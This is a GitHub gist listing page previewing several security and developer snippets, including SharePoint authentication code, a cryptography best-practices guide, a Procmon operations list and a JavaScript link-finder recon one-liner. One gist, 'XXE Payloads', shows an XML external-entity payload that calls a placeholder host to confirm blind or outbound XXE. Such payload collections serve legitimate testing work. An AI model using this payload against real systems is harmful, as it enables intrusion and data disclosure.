Skip to content

Instantly share code, notes, and snippets.

View codingo's full-sized avatar

Michael Skelton codingo

3.5k followers · 340 following
View GitHub Profile
@juntalis
juntalis / spauth.py
Created April 1, 2012 07:46
Claims-based Authentication Example for interacting with Sharepoint Online
import os, requests, re
from htmlentitydefs import name2codepoint
from simplejson import loads, dumps
spauth = None
def unescape(s):
name2codepoint['#39'] = 39
return re.sub('&(%s);' % '|'.join(name2codepoint),
lambda m: unichr(name2codepoint[m.group(1)]), s)
@staaldraad
staaldraad / XXE_payloads
Last active July 31, 2025 23:05
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@atoponce
atoponce / gist:07d8d4c833873be2f68c34f9afc5a78a
Last active August 11, 2025 13:19 — forked from tqbf/gist:be58d2d39690c3b366ad
Cryptographic Best Practices

Cryptographic Best Practices

Putting cryptographic primitives together is a lot like putting a jigsaw puzzle together, where all the pieces are cut exactly the same way, but there is only one correct solution. Thankfully, there are some projects out there that are working hard to make sure developers are getting it right.

The following advice comes from years of research from leading security researchers, developers, and cryptographers. This Gist was [forked from Thomas Ptacek's Gist][1] to be more readable. Additions have been added from

@mgeeky
mgeeky / Procmon_operationst.txt
Last active July 22, 2025 00:11
PROCMON Operations list
CloseFile
CreateFile
CreateFileMapping
DeviceIoControl
FileSystemControl
FlushBuffersFile
Load Image
LockFile
NotifyChangeDirectory
Process Create
@nerandell
nerandell / code-review-checklist.md
Last active August 19, 2025 14:27
PHP Code Review Guidelines

Make sure these boxes are checked before submitting/approving the PR

General

  • The code works
  • The code is easy to understand
  • Follows coding conventions
  • Names are simple and if possible short
  • Names are spelt correctly
  • Names contain units where applicable
  • There are no usages of magic numbers
@stefan2904
stefan2904 / index.php
Created October 2, 2016 17:49
TUM CTF: free_as_in_bavarian_beer (writeup on https://hack.more.systems )
<?php
/*
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
@PaulSec
PaulSec / monitor_cve.py
Created February 26, 2018 09:50
Monitors @cvenew and sends me a message on Telegram if a keyword triggers
from tweepy import StreamListener
from tweepy import Stream
import tweepy
import json
import telebot
import requests
CONSUMER_KEY = 'XXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_KEY = 'XXXXXXXXXXXXXXXXXXXXXXX'
@zeroSteiner
zeroSteiner / log_handler.py
Last active April 6, 2022 19:14
Python logging.Handler for use in external Metasploit modules.
import logging
import metasploit.module as module
class MetasploitLogHandler(logging.Handler):
def emit(self, record):
log_entry = self.format(record)
level = 'debug'
if record.levelno >= logging.ERROR:
level = 'error'
elif record.levelno >= logging.WARNING:
@Rhynorater
Rhynorater / bookmarklet.js
Created March 27, 2018 01:19
OSCP Video Playback Speed Increase
javascript:document.getElementById("video").defaultPlaybackRate = prompt("Enter your prefered playback rate:");document.getElementById("video").load();
@ntrzz
ntrzz / linkfinder-oneliner.sh
Last active January 21, 2023 10:12
curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt